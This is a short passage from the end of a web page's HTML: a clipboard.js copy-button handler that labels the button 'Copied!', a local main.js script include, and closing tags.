        return trigger.nextElementSibling;
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

</body>
</html>
